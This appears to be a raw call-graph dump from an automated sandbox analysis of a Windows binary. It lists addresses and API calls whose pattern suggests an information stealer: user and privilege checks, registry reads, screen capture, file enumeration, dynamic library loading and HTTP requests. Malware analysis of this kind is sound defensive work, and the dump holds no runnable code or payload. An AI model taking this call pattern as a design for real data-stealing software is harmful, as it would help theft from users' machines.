403580 18414->18415 18416 4035a4 18415->18416 18417 402550 13 API calls 18415->18417 18418 405668 62 API calls 18416->18418 18417->18416 18418->18143 19286 403538 18419->19286 18423 407df9 18424 407e09 18423->18424 18426 403538 27 API calls 18423->18426 18425 407c34 2 API calls 18424->18425 18427 407e13 18425->18427 18426->18424 18428 407e23 18427->18428 18429 403538 27 API calls 18427->18429 18430 407c34 2 API calls 18428->18430 18429->18428 18431 407e2d 18430->18431 18432 407e3d 18431->18432 18433 403538 27 API calls 18431->18433 19297 407d14 18432->19297 18433->18432 18435 407e42 18436 407e52 18435->18436 18437 403538 27 API calls 18435->18437 18438 406ce8 18436->18438 18437->18436 18439 406cf0 18438->18439 18439->18439 18440 406d13 18439->18440 18441 406d25 18439->18441 18442 403538 27 API calls 18440->18442 19425 406f30 18441->19425 18445 406d20 18442->18445 18444 406d2d 19430 406bd8 18444->19430 18447 403508 13 API calls 18445->18447 18449 406e37 18447->18449 18448 406d40 19438 4065f0 GetUserNameW 18448->19438 18450 403bf4 SysFreeString 18449->18450 18451 406e44 18450->18451 18452 403508 13 API calls 18451->18452 18454 406e51 18452->18454 18475 403798 18454->18475 18455 406d53 19444 406634 18455->19444 18457 406d66 19451 40627c 18457->19451 18460 40627c 27 API calls 18461 406d8a 18460->18461 18462 40627c 27 API calls 18461->18462 18463 406d98 18462->18463 18464 40627c 27 API calls 18463->18464 18465 406da6 18464->18465 18466 403850 27 API calls 18465->18466 18467 406dc2 18466->18467 18468 40627c 27 API calls 18467->18468 18469 406dcd 18468->18469 18470 403850 27 API calls 18469->18470 18472 406ddd 18470->18472 18471 406e13 18473 403538 27 API calls 18471->18473 18472->18471 19461 403a78 18472->19461 18473->18445 18476 4037db 18475->18476 18477 40379c 18475->18477 18476->18149 18478 4037a6 18477->18478 18479 403538 18477->18479 18480 4037d0 18478->18480 18481 4037b9 18478->18481 18485 4035a8 27 API calls 18479->18485 18486 40354c 18479->18486 18483 403b1c 27 API calls 18480->18483 18482 403b1c 27 API calls 18481->18482 18488 4037be 18482->18488 18483->18488 18484 40357a 18484->18149 18485->18486 18486->18484 18487 402550 13 API calls 18486->18487 18487->18484 18488->18149 18491 416e0d 18489->18491 18490 416e75 18492 4034e4 13 API calls 18490->18492 18491->18490 19522 4039e8 18491->19522 18494 416e8a 18492->18494 18495 4069a8 18494->18495 18496 4069c7 18495->18496 18497 4034e4 13 API calls 18496->18497 18498 4069dd 18497->18498 18499 406a88 18498->18499 18504 4036cc 27 API calls 18498->18504 18505 403798 27 API calls 18498->18505 18500 403508 13 API calls 18499->18500 18501 406aa2 18500->18501 18502 4034e4 13 API calls 18501->18502 18503 406aaa 18502->18503 18503->18165 18504->18498 18505->18498 18507 40684d 18506->18507 18508 4034e4 13 API calls 18507->18508 18513 406862 18508->18513 18509 4068d2 18510 403508 13 API calls 18509->18510 18512 4068ec 18510->18512 18515 4034e4 13 API calls 18512->18515 18513->18509 18514 40680c 27 API calls 18513->18514 18517 403798 27 API calls 18513->18517 18518 403850 27 API calls 18513->18518 19528 4036cc 18513->19528 18514->18513 18516 4068f4 18515->18516 18519 4037dc 18516->18519 18517->18513 18518->18513 18520 4037e0 18519->18520 18528 403798 18519->18528 18521 403538 18520->18521 18523 4037f0 18520->18523 18524 4037fe 18520->18524 18520->18528 18526 4035a8 27 API calls 18521->18526 18531 40354c 18521->18531 18522 40357a 18522->18180 18529 403538 27 API calls 18523->18529 18525 4035a8 27 API calls 18524->18525 18530 403811 18525->18530 18526->18531 18527 4037db 18527->18180 18528->18521 18528->18527 18532 4037a6 18528->18532 18529->18528 18539 403538 27 API calls 18530->18539 18531->18522 18533 402550 13 API calls 18531->18533 18534 4037d0 18532->18534 18535 4037b9 18532->18535 18533->18522 18537 403b1c 27 API calls 18534->18537 18536 403b1c 27 API calls 18535->18536 18538 4037be 18536->18538 18537->18538 18538->18180 18540 40383d 18539->18540 18540->18180 18542 417dad 18541->18542 18543 417e02 18542->18543 18544 40357c 13 API calls 18542->18544 18545 4034e4 13 API calls 18543->18545 18544->18543 18546 417e0a 18545->18546 18547 40357c 13 API calls 18546->18547 18548 417e15 18547->18548 18549 40357c 13 API calls 18548->18549 18550 417e26 18549->18550 18551 4039e8 27 API calls 18550->18551 18552 417e2e GetModuleHandleA 18551->18552 18553 417e4a 18552->18553 18554 417e3a 18552->18554 18555 4039e8 27 API calls 18553->18555 18556 4039e8 27 API calls 18554->18556 18558 417e52 GetProcAddress 18555->18558 18557 417e42 LoadLibraryA 18556->18557 18557->18553 18559 4039e8 27 API calls 18558->18559 18560 417e67 GetProcAddress 18559->18560 18561 4039e8 27 API calls 18560->18561 18562 417e7c GetProcAddress 18561->18562 18563 4039e8 27 API calls 18562->18563 18564 417e91 GetProcAddress 18563->18564 18565 4039e8 27 API calls 18564->18565 18566 417ea6 GetProcAddress 18565->18566 18567 4039e8 27 API calls 18566->18567 18568 417ebb GetProcAddress 18567->18568 18569 4039e8 27 API calls 18568->18569 18570 417ed0 GetProcAddress 18569->18570 18571 4039e8 27 API calls 18570->18571 18572 417ee4 GetProcAddress 18571->18572 18573 4039e8 27 API calls 18572->18573 18574 417efb GetProcAddress 18573->18574 18575 417f17 18574->18575 18576 417fed InternetCrackUrlA 18575->18576 18577 417ffc 18576->18577 19531 4039f0 18577->19531 18579 41801d 18580 418072 InternetOpenA 18579->18580 18583 4037dc 27 API calls 18579->18583 18581 4181d1 18580->18581 18582 41808c InternetConnectA 18580->18582 18584 4181e0 18581->18584 18588 418223 18581->18588 18582->18581 18595 4180cf 18582->18595 18585 418056 18583->18585 19559 417840 18584->19559 19538 417688 18585->19538 18589 41825a 18588->18589 18592 40627c 27 API calls 18588->18592 18590 403538 27 API calls 18589->18590 18593 418265 18590->18593 18591 418064 18591->18580 18598 418240 18592->18598 18596 4034e4 13 API calls 18593->18596 18600 418117 HttpOpenRequestA 18595->18600 18597 41826d 18596->18597 18599 403508 13 API calls 18597->18599 18598->18589 18601 4034e4 13 API calls 18598->18601 18602 41828a 18599->18602 18603 4181cb InternetCloseHandle 18600->18603 18607 41812c 18600->18607 18601->18589 18604 403508 13 API calls 18602->18604 18603->18581 18605 418297 18604->18605 18606 403508 13 API calls 18605->18606 18608 4182a4 18606->18608 18609 418161 HttpSendRequestA 18607->18609 18610 403508 13 API calls 18608->18610 18609->18603 18614 418174 18609->18614 18611 4182b1 18610->18611 18611->18189 18612 418184 InternetReadFile 18613 4035d4 27 API calls 18612->18613 18613->18614 18614->18603 18614->18612 18615 403798 27 API calls 18614->18615 18615->18614 18617 407504 18616->18617 18618 4034e4 13 API calls 18617->18618 18621 407529 18618->18621 18619 407593 18620 403508 13 API calls 18619->18620 18622 4075ad 18620->18622 18621->18619 18623 4039f0 27 API calls 18621->18623 18622->18204 18624 407571 18623->18624 18624->18619 18625 4039f0 27 API calls 18624->18625 18625->18619 18627 406b24 18626->18627 18628 40357c 13 API calls 18627->18628 18630 406b3f 18628->18630 18629 406b8f 18631 403538 27 API calls 18629->18631 18630->18629 18632 4039e8 27 API calls 18630->18632 18633 406b9a 18631->18633 18632->18630 18634 4034e4 13 API calls 18633->18634 18635 406baf 18634->18635 18636 4034e4 13 API calls 18635->18636 18637 406bb7 18636->18637 18638 407a18 18637->18638 18639 404804 32 API calls 18638->18639 18641 407a3a 18639->18641 18640 407a9b 18642 404804 32 API calls 18640->18642 18641->18640 18643 404804 32 API calls 18641->18643 18645 4039f0 27 API calls 18641->18645 18644 407ab6 18642->18644 18643->18641 18646 4039f0 27 API calls 18644->18646 18645->18641 18647 407adc 18646->18647 18647->18219 18649 408196 18648->18649 18650 407a18 32 API calls 18649->18650 18651 4081b4 18650->18651 18652 403538 27 API calls 18651->18652 18653 4082c3 18652->18653 18654 403538 27 API calls 18653->18654 18655 4082d3 18654->18655 18656 403538 27 API calls 18655->18656 18657 4082e3 18656->18657 18658 403538 27 API calls 18657->18658 18659 4082f3 18658->18659 18660 403538 27 API calls 18659->18660 18661 408303 18660->18661 18662 403538 27 API calls 18661->18662 18663 408313 18662->18663 18664 403538 27 API calls 18663->18664 18665 408323 18664->18665 18666 403538 27 API calls 18665->18666 18667 408333 18666->18667 18668 403538 27 API calls 18667->18668 18669 408353 18668->18669 18670 403538 27 API calls 18669->18670 18671 408363 18670->18671 18672 403538 27 API calls 18671->18672 18673 408373 18672->18673 18674 403538 27 API calls 18673->18674 18675 408383 18674->18675 18676 403538 27 API calls 18675->18676 18677 408393 18676->18677 18678 403538 27 API calls 18677->18678 18679 4088ac 18678->18679 18680 403538 27 API calls 18679->18680 18681 4088bf 18680->18681 18682 403538 27 API calls 18681->18682 18683 4088d2 18682->18683 18684 403538 27 API calls 18683->18684 18685 4088e5 18684->18685 18686 403538 27 API calls 18685->18686 18687 4088f8 18686->18687 18688 403538 27 API calls 18687->18688 18689 408a74 18688->18689 18690 403538 27 API calls 18689->18690 18691 408a87 18690->18691 18692 403538 27 API calls 18691->18692 18693 408a9a 18692->18693 18694 403538 27 API calls 18693->18694 18695 408aad 18694->18695 18696 403538 27 API calls 18695->18696 18697 408b32 18696->18697 18698 403538 27 API calls 18697->18698 18699 408b45 18698->18699 18700 403538 27 API calls 18699->18700 18701 408b58 18700->18701 18702 403538 27 API calls 18701->18702 18703 408b6b 18702->18703 18704 403538 27 API calls 18703->18704 18705 408b7e 18704->18705 18706 403538 27 API calls 18705->18706 18707 408b91 18706->18707 18708 403538 27 API calls 18707->18708 18709 408ba4 18708->18709 18710 403538 27 API calls 18709->18710 18711 408bca 18710->18711 18712 403538 27 API calls 18711->18712 18713 408bdd 18712->18713 18714 403538 27 API calls 18713->18714 18715 408bf0 18714->18715 18716 403538 27 API calls 18715->18716 18717 408c03 18716->18717 18718 403538 27 API calls 18717->18718 18719 408c16 18718->18719 18720 403538 27 API calls 18719->18720 18721 408c29 18720->18721 18722 403538 27 API calls 18721->18722 18723 408c3c 18722->18723 18724 403538 27 API calls 18723->18724 18725 408c4f 18724->18725 18726 403538 27 API calls 18725->18726 18727 408c62 18726->18727 18728 403538 27 API calls 18727->18728 18729 408c75 18728->18729 18730 403538 27 API calls 18729->18730 18731 408c88 18730->18731 18732 403538 27 API calls 18731->18732 18733 408c9b 18732->18733 18734 403538 27 API calls 18733->18734 18735 408cae 18734->18735 18736 403538 27 API calls 18735->18736 18737 408cc1 18736->18737 18738 403538 27 API calls 18737->18738 18739 408cd4 18738->18739 18740 403538 27 API calls 18739->18740 18741 408ce7 18740->18741 18742 403538 27 API calls 18741->18742 18743 408cfa 18742->18743 18744 403538 27 API calls 18743->18744 18745 408d0d 18744->18745 18746 403538 27 API calls 18745->18746 18747 408d20 18746->18747 18748 403538 27 API calls 18747->18748 18749 408d33 18748->18749 18750 403538 27 API calls 18749->18750 18751 408d46 18750->18751 18752 403538 27 API calls 18751->18752 18753 408d59 18752->18753 18754 403538 27 API calls 18753->18754 18755 408d6c 18754->18755 18756 403538 27 API calls 18755->18756 18757 408d7f 18756->18757 18758 403538 27 API calls 18757->18758 18759 408d92 18758->18759 18760 403538 27 API calls 18759->18760 18761 408da5 18760->18761 18762 404810 15 API calls 18761->18762 18763 408de6 18762->18763 18764 4034e4 13 API calls 18763->18764 18765 408dee 18764->18765 18766 409668 18765->18766 18767 40967f 18766->18767 19728 4062fc 18767->19728 18770 403c18 3 API calls 18771 4096b5 18770->18771 18772 4096be CreateDirectoryW 18771->18772 19733 4094e0 18772->19733 18779 4096ec 18780 4062fc 3 API calls 18779->18780 18781 4096f9 18780->18781 18782 403c18 3 API calls 18781->18782 18784 409703 18782->18784 18783 40971c 18785 409739 SetCurrentDirectoryW 18783->18785 18786 40970c CreateDirectoryW 18784->18786 18787 403e14 3 API calls 18785->18787 18788 4094e0 37 API calls 18786->18788 18789 409759 18787->18789 18788->18783 18790 409761 LoadLibraryExW 18789->18790 18791 409940 18790->18791 18792 409772 18790->18792 18793 403bf4 SysFreeString 18791->18793 18794 40977e GetProcAddress 18792->18794 18795 40995a 18793->18795 19766 403990 18794->19766 18797 4034e4 13 API calls 18795->18797 18799 409962 18797->18799 18799->18287 18800 403990 18801 4097b2 GetProcAddress 18800->18801 18802 403990 18801->18802 18803 4097cc GetProcAddress 18802->18803 18804 403990 18803->18804 18805 4097e6 GetProcAddress 18804->18805 18806 403990 18805->18806 18807 409800 GetProcAddress 18806->18807 18808 403990 18807->18808 18809 40981a GetProcAddress 18808->18809 18810 403990 18809->18810 18811 409834 GetProcAddress 18810->18811 18812 403990 18811->18812 18813 40984e GetProcAddress 18812->18813 18814 403990 18813->18814 18815 409868 GetProcAddress 18814->18815 18816 403990 18815->18816 18817 409882 GetProcAddress 18816->18817 18818 403990 18817->18818 18819 40989c GetProcAddress 18818->18819 18820 403990 18819->18820 18821 4098b6 GetProcAddress 18820->18821 18821->18791 18822 4098cd 18821->18822 18822->18791 18824 4169b4 18823->18824 18824->18824 18825 406ce8 43 API calls 18824->18825 18826 4169d9 18825->18826 18827 403850 27 API calls 18826->18827 18828 4169ed 18827->18828 19784 4166a4 GetModuleFileNameA 18828->19784 18830 4169fe 18831 403850 27 API calls 18830->18831 18832 416a12 18831->18832 19786 407b08 18832->19786 18835 403850 27 API calls 18836 416a36 18835->18836 19808 4066e4 18836->19808 18839 406bd8 10 API calls 18840 416a5c 18839->18840 18841 403e78 3 API calls 18840->18841 18842 416a71 18841->18842 18843 4037dc 27 API calls 18842->18843 18844 416a8a 18843->18844 18845 406634 5 API calls 18844->18845 18846 416aa0 18845->18846 18847 4065f0 6 API calls 18846->18847 18848 416ab0 18847->18848 18849 403e78 3 API calls 18848->18849 18850 416aca 18849->18850 18851 4037dc 27 API calls 18850->18851 18852 416ae3 18851->18852 18853 416aee GetSystemMetrics 18852->18853 18854 40709c 4 API calls 18853->18854 20069 40a394 18913->20069 18937 405434 18934->18937 18935 405503 18935->18287 18936 403850 27 API calls 18936->18937 18937->18935 18937->18936 20971 410304 18938->20971 18944 4034e4 13 API calls 18943->18944 18945 405580 18944->18945 18946 4055b3 18945->18946 18947 403850 27 API calls 18945->18947 18946->18287 18947->18945 21857 4132f8 18948->21857 18952 414df0 18951->18952 18952->18952 18953 404150 SysAllocStringLen 18952->18953 18954 414e05 18953->18954 18955 4062fc 3 API calls 18954->18955 18956 414e2c 18955->18956 18957 403e14 3 API calls 18956->18957 18958 414e40 18957->18958 18959 40776c SysFreeString SysAllocStringLen GetFileAttributesW 18958->18959 18960 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18958->18960 18961 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 18958->18961 18962 415119 18958->18962 18968 40e79c 36 API calls 18958->18968 18959->18958 18960->18958 18961->18958 18963 4075c0 8 API calls 18962->18963 18965 41513d 18963->18965 18964 415279 18966 4075c0 8 API calls 18964->18966 18965->18964 18967 40776c 3 API calls 18965->18967 18971 415295 18966->18971 18969 415156 18967->18969 18968->18958 18969->18964 22171 4077c8 18969->22171 18972 4152f8 18971->18972 18974 40776c 3 API calls 18971->18974 18976 403bf4 SysFreeString 18972->18976 18977 4152aa 18974->18977 18975 403e78 3 API calls 18978 41518a 18975->18978 18979 415317 18976->18979 18977->18972 18981 403e14 3 API calls 18977->18981 22180 40e79c 18978->22180 18980 4034e4 13 API calls 18979->18980 18982 415322 18980->18982 18983 4152c1 18981->18983 18985 403bf4 SysFreeString 18982->18985 18990 403e14 3 API calls 18983->18990 18987 415332 18985->18987 18989 4034e4 13 API calls 18987->18989 18988 4077c8 6 API calls 18991 4151bf 18988->18991 18994 41533d 18989->18994 18992 4152ec 18990->18992 18993 403e78 3 API calls 18991->18993 18995 40e79c 36 API calls 18992->18995 18996 4151da 18993->18996 18997 403bf4 SysFreeString 18994->18997 18995->18972 19000 403e14 3 API calls 18996->19000 18998 41534d 18997->18998 18999 4034e4 13 API calls 18998->18999 19001 415358 18999->19001 19002 415205 19000->19002 19003 403bf4 SysFreeString 19001->19003 19005 40e79c 36 API calls 19002->19005 19004 415368 19003->19004 19006 4034e4 13 API calls 19004->19006 19007 415211 19005->19007 19008 415373 19006->19008 19009 4077c8 6 API calls 19007->19009 19010 403bf4 SysFreeString 19008->19010 19011 415227 19009->19011 19012 415383 19010->19012 19013 403e78 3 API calls 19011->19013 19014 4034e4 13 API calls 19012->19014 19015 415242 19013->19015 19016 41538e 19014->19016 19019 403e14 3 API calls 19015->19019 19017 403bf4 SysFreeString 19016->19017 19018 41539e 19017->19018 19020 4034e4 13 API calls 19018->19020 19021 41526d 19019->19021 19023 4153a9 19020->19023 19022 40e79c 36 API calls 19021->19022 19022->18964 19024 403bf4 SysFreeString 19023->19024 19025 4153b9 19024->19025 19026 4034e4 13 API calls 19025->19026 19027 4153c4 19026->19027 19028 403bf4 SysFreeString 19027->19028 19029 4153d4 19028->19029 19030 403bf4 SysFreeString 19029->19030 19031 4153e1 19030->19031 19031->18284 19033 40512a 19032->19033 22205 405088 19033->22205 19036 403850 27 API calls 19037 405160 19036->19037 19038 403508 13 API calls 19037->19038 19039 40517a 19038->19039 19039->18287 19041 404150 SysAllocStringLen 19040->19041 19042 414853 19041->19042 19043 4062fc 3 API calls 19042->19043 19044 414874 19043->19044 19045 403e14 3 API calls 19044->19045 19049 414888 19045->19049 19046 40776c 3 API calls 19046->19049 19047 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 19047->19049 19048 414995 19050 403bf4 SysFreeString 19048->19050 19049->19046 19049->19047 19049->19048 19053 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 19049->19053 19056 40e79c 36 API calls 19049->19056 19051 4149bc 19050->19051 19052 4034e4 13 API calls 19051->19052 19054 4149c7 19052->19054 19053->19049 19055 403bf4 SysFreeString 19054->19055 19057 4149d7 19055->19057 19056->19049 19058 403bf4 SysFreeString 19057->19058 19059 4149e4 19058->19059 19059->18287 19061 413f61 19060->19061 19061->19061 19062 404150 SysAllocStringLen 19061->19062 19063 413f7f 19062->19063 19064 404150 SysAllocStringLen 19063->19064 19065 413f87 19064->19065 19066 404150 SysAllocStringLen 19065->19066 19067 413f8f 19066->19067 19068 404150 SysAllocStringLen 19067->19068 19069 413f97 19068->19069 19070 4062fc 3 API calls 19069->19070 19071 413fb8 19070->19071 19072 407a18 32 API calls 19071->19072 19073 413fe7 19072->19073 19074 407a18 32 API calls 19073->19074 19075 414008 19074->19075 19079 404804 32 API calls 19075->19079 19097 414088 19075->19097 19076 403bf4 SysFreeString 19077 414646 19076->19077 19078 403508 13 API calls 19077->19078 19080 414656 19078->19080 19081 414035 19079->19081 19082 403bdc SysFreeString 19080->19082 19085 4078d8 8 API calls 19081->19085 19083 414661 19082->19083 19084 403508 13 API calls 19083->19084 19086 414671 19084->19086 19087 414056 19085->19087 19088 403bf4 SysFreeString 19086->19088 19089 403c18 3 API calls 19087->19089 19090 414681 19088->19090 19143 414062 19089->19143 19091 4034e4 13 API calls 19090->19091 19092 41468c 19091->19092 19093 403bf4 SysFreeString 19092->19093 19094 41469c 19093->19094 19095 403508 13 API calls 19094->19095 19096 4146ac 19095->19096 19098 403bf4 SysFreeString 19096->19098 19097->19076 19099 4146bc 19098->19099 19100 4034e4 13 API calls 19099->19100 19101 4146c7 19100->19101 19102 403bdc SysFreeString 19101->19102 19103 4146d2 19102->19103 19105 4034e4 13 API calls 19103->19105 19104 403bdc SysFreeString 19104->19143 19106 4146dd 19105->19106 19107 403bf4 SysFreeString 19106->19107 19108 4146ed 19107->19108 19109 403508 13 API calls 19108->19109 19110 4146fd 19109->19110 19112 403bdc SysFreeString 19110->19112 19111 403e14 3 API calls 19111->19143 19113 414708 19112->19113 19114 404810 15 API calls 19113->19114 19115 414716 19114->19115 19116 403bdc SysFreeString 19115->19116 19117 41471e 19116->19117 19119 404810 15 API calls 19117->19119 19118 414114 FindFirstFileW 19118->19143 19120 41472c 19119->19120 19121 403bf4 SysFreeString 19120->19121 19122 414739 19121->19122 19129 4145fe FindNextFileW 19131 414613 FindClose 19129->19131 19129->19143 19130 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 19130->19143 19131->19143 19133 406144 27 API calls 19133->19143 19134 414501 GetFileAttributesW 19134->19129 19134->19143 19135 404804 32 API calls 19135->19143 19136 403c18 3 API calls 19136->19129 19137 40e79c 36 API calls 19137->19143 19138 40633c 27 API calls 19138->19143 19139 4077c8 6 API calls 19139->19143 19140 403f90 SysAllocStringLen SysAllocStringLen SysFreeString 19140->19143 19141 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 19141->19143 19142 4078d8 8 API calls 19142->19143 19143->19097 19143->19104 19143->19111 19143->19118 19143->19129 19143->19130 19143->19133 19143->19134 19143->19135 19143->19136 19143->19137 19143->19138 19143->19139 19143->19140 19143->19141 19143->19142 22213 413d08 19143->22213 19145 414a98 19144->19145 19145->19145 19146 404150 SysAllocStringLen 19145->19146 19147 414aae 19146->19147 19148 4075c0 8 API calls 19147->19148 19149 414ae2 19148->19149 19150 40717c 8 API calls 19149->19150 19151 414afb 19150->19151 19152 403e14 3 API calls 19151->19152 19155 414b1d 19152->19155 19153 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 19153->19155 19154 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 19154->19155 19155->19153 19155->19154 19156 40e79c 36 API calls 19155->19156 19157 414bc8 19155->19157 19156->19155 19158 403e14 3 API calls 19157->19158 19159 414be6 19158->19159 19160 403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 19159->19160 19161 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 19159->19161 19162 40e79c 36 API calls 19159->19162 19163 414c91 19159->19163 19160->19159 19161->19159 19162->19159 19164 403bf4 SysFreeString 19163->19164 19165 414cb8 19164->19165 19166 4034e4 13 API calls 19165->19166 19167 414cc3 19166->19167 19168 403bf4 SysFreeString 19167->19168 19169 414cd3 19168->19169 19170 4034e4 13 API calls 19169->19170 19171 414cde 19170->19171 19172 403bf4 SysFreeString 19171->19172 19173 414cee 19172->19173 19174 403bf4 SysFreeString 19173->19174 19175 414cfb 19174->19175 19175->18287 19177 4171e1 19176->19177 19178 417005 19176->19178 19177->18287 19178->19177 19179 4170ae GetDC CreateCompatibleDC CreateCompatibleBitmap SelectObject BitBlt 19178->19179 19180 40495c 19179->19180 19181 4170ff CreateStreamOnHGlobal 19180->19181 19182 417117 19181->19182 22272 416efc 19182->22272 19186 4035d4 27 API calls 19187 4171b0 GlobalUnlock DeleteObject DeleteDC ReleaseDC 19186->19187 19187->19177 19190 4070cb 19189->19190 19191 403c18 3 API calls 19190->19191 19192 4070e3 19191->19192 19193 403bdc SysFreeString 19192->19193 19194 4070f8 19193->19194 19194->18287 19201 403c44 19195->19201 19196 403c66 19199 403c99 19196->19199 22278 403624 MultiByteToWideChar 19196->22278 19197 403c5d 19198 403bdc SysFreeString 19197->19198 19209 403c64 19198->19209 19202 40410c 3 API calls 19199->19202 19201->19196 19201->19197 19204 403ca4 19202->19204 19203 403c84 19203->19199 19205 403c8a 19203->19205 22279 403624 MultiByteToWideChar 19204->22279 19207 403cd0 4 API calls 19205->19207 19207->19209 19208 403cb2 19208->19209 19210 40410c 3 API calls 19208->19210 19209->18284 19210->19209 19213 403dc5 19211->19213 19212 403e0d 19212->18284 19213->19212 19214 403bb4 2 API calls 19213->19214 19215 403ddf 19214->19215 19216 403bcc SysFreeString 19215->19216 19216->19212 19218 404150 SysAllocStringLen 19217->19218 19219 4078ef 19218->19219 19220 403c18 3 API calls 19219->19220 19221 407907 19220->19221 19222 40717c 8 API calls 19221->19222 19223 40791c 19222->19223 19224 403c18 3 API calls 19223->19224 19225 407926 19224->19225 19226 40717c 8 API calls 19225->19226 19227 40793b 19226->19227 19228 403c18 3 API calls 19227->19228 19229 407945 19228->19229 19230 40717c 8 API calls 19229->19230 19231 407957 19230->19231 19232 403c18 3 API calls 19231->19232 19233 407961 19232->19233 19234 403bf4 SysFreeString 19233->19234 19235 40797b 19234->19235 19235->18284 19238 403bfa 19236->19238 19237 403c00 SysFreeString 19237->19238 19238->19237 19239 403c12 19238->19239 19239->18162 19242 40350e 19240->19242 19241 403534 19244 403bdc 19241->19244 19242->19241 19243 402550 13 API calls 19242->19243 19243->19242 19245 403bf0 19244->19245 19246 403be2 SysFreeString 19244->19246 19245->18177 19246->19245 19248 404289 19247->19248 19267 4042be 19247->19267 19249 4042c3 19248->19249 19250 40429e 19248->19250 19253 4042d4 19249->19253 19254 4042ca 19249->19254 19251 4042e0 19250->19251 19252 4042a2 19250->19252 19255 4042e7 19251->19255 19256 4042ee 19251->19256 19257 4042a6 19252->19257 19258 4042f7 19252->19258 19260 403508 13 API calls 19253->19260 19259 4034e4 13 API calls 19254->19259 19261 403bdc SysFreeString 19255->19261 19262 403bf4 SysFreeString 19256->19262 19263 404306 19257->19263 19264 4042aa 19257->19264 19258->19267 22280 404268 19258->22280 19259->19267 19260->19267 19261->19267 19262->19267 19263->19267 19268 404280 15 API calls 19263->19268 19266 404324 19264->19266 19271 4042ae 19264->19271 19266->19267 22285 404234 19266->22285 19267->18289 19268->19263 19270 404810 15 API calls 19270->19271 19271->19267 19271->19270 19273 402555 19272->19273 19275 402568 19272->19275 19273->19275 19276 402614 19273->19276 19275->18413 19277 4025cc 19276->19277 19280 4025c0 19277->19280 19283 4034cc 19280->19283 19284 4033f4 13 API calls 19283->19284 19285 4025cb 19284->19285 19285->19275 19287 40353c 19286->19287 19290 40354c 19286->19290 19287->19290 19303 4035a8 19287->19303 19288 40357a 19292 407c34 19288->19292 19290->19288 19291 402550 13 API calls 19290->19291 19291->19288 19293 407c73 19292->19293 19294 407cc4 CheckTokenMembership 19293->19294 19295 407cdb FreeSid 19293->19295 19294->19295 19295->18423 19298 407d5a 19297->19298 19299 407d60 LookupAccountSidA CheckTokenMembership 19298->19299 19300 407dd9 19298->19300 19301 407dae FreeSid 19299->19301 19300->18435 19301->18435 19304 4035d0 19303->19304 19305 4035ac 19303->19305 19304->19290 19308 402530 19305->19308 19309 402535 19308->19309 19310 402548 19308->19310 19314 401f5c 19309->19314 19310->19290 19311 40253b 19311->19310 19312 402614 13 API calls 19311->19312 19312->19310 19315 401f70 19314->19315 19316 401f75 19314->19316 19325 401870 RtlInitializeCriticalSection 19315->19325 19318 401fa2 RtlEnterCriticalSection 19316->19318 19319 401fac 19316->19319 19324 401f81 19316->19324 19318->19319 19319->19324 19332 401e68 19319->19332 19322 4020d7 19322->19311 19323 4020cd RtlLeaveCriticalSection 19323->19322 19324->19311 19326 401894 RtlEnterCriticalSection 19325->19326 19327 40189e 19325->19327 19326->19327 19328 4018bc LocalAlloc 19327->19328 19329 4018d6 19328->19329 19330 401925 19329->19330 19331 40191b RtlLeaveCriticalSection 19329->19331 19330->19316 19331->19330 19335 401e78 19332->19335 19333 401ea4 19337 401ec8 19333->19337 19343 401c7c 19333->19343 19335->19333 19335->19337 19338 401ddc 19335->19338 19337->19322 19337->19323 19347 401630 19338->19347 19341 401df9 19341->19335 19344 401cd1 19343->19344 19345 401c9a 19343->19345 19344->19345 19393 401bcc 19344->19393 19345->19337 19350 40164c 19347->19350 19349 401656 19372 40151c 19349->19372 19350->19349 19352 4016b3 19350->19352 19355 4016a7 19350->19355 19364 401388 19350->19364 19376 401284 19350->19376 19352->19341 19357 401d50 19352->19357 19354 401662 19354->19352 19380 401464 19355->19380 19384 401d04 19357->19384 19360 401284 LocalAlloc 19361 401d74 19360->19361 19363 401d7c 19361->19363 19388 401aa8 19361->19388 19363->19341 19365 401397 VirtualAlloc 19364->19365 19367 4013c4 19365->19367 19368 4013e7 19365->19368 19369 40123c LocalAlloc 19367->19369 19368->19350 19370 4013d0 19369->19370 19370->19368 19371 4013d4 VirtualFree 19370->19371 19371->19368 19373 401562 19372->19373 19374 401592 19373->19374 19375 40157e VirtualAlloc 19373->19375 19374->19354 19375->19373 19375->19374 19377 4012a0 19376->19377 19378 40123c LocalAlloc 19377->19378 19379 4012e6 19378->19379 19379->19350 19382 401493 19380->19382 19381 4014ec 19381->19352 19382->19381 19383 4014c0 VirtualFree 19382->19383 19383->19382 19385 401d16 19384->19385 19386 401d0d 19384->19386 19385->19360 19386->19385 19387 401ad8 9 API calls 19386->19387 19387->19385 19389 401ac5 19388->19389 19390 401ab6 19388->19390 19389->19363 19391 401c7c 9 API calls 19390->19391 19392 401ac3 19391->19392 19392->19363 19394 401be2 19393->19394 19395 401c21 19394->19395 19396 401c0d 19394->19396 19405 401c6a 19394->19405 19398 4017e4 3 API calls 19395->19398 19406 4017e4 19396->19406 19399 401c1f 19398->19399 19400 401aa8 9 API calls 19399->19400 19399->19405 19401 401c45 19400->19401 19402 401c5f 19401->19402 19416 401afc 19401->19416 19421 4012f4 19402->19421 19405->19345 19407 40180a 19406->19407 19415 401863 19406->19415 19408 4015b0 VirtualFree 19407->19408 19409 401817 19408->19409 19410 401284 LocalAlloc 19409->19410 19411 401827 19410->19411 19412 401464 VirtualFree 19411->19412 19414 40183e 19411->19414 19412->19414 19413 4012f4 LocalAlloc 19413->19415 19414->19413 19414->19415 19415->19399 19417 401b01 19416->19417 19418 401b0f 19416->19418 19419 401ad8 9 API calls 19417->19419 19418->19402 19420 401b0e 19419->19420 19420->19402 19422 4012ff 19421->19422 19423 40131a 19422->19423 19424 40123c LocalAlloc 19422->19424 19423->19405 19424->19423 19426 403bdc SysFreeString 19425->19426 19427 406f3f 19426->19427 19465 406e6c 19427->19465 19493 403c18 19430->19493 19432 406bf5 RegCreateKeyExW 19433 406c20 RegQueryValueExW 19432->19433 19434 406c62 19432->19434 19435 406c55 RegCloseKey 19433->19435 19436 406c45 19433->19436 19434->18448 19435->19434 19437 403d6c 4 API calls 19436->19437 19437->19435 19439 406613 19438->19439 19440 406625 19438->19440 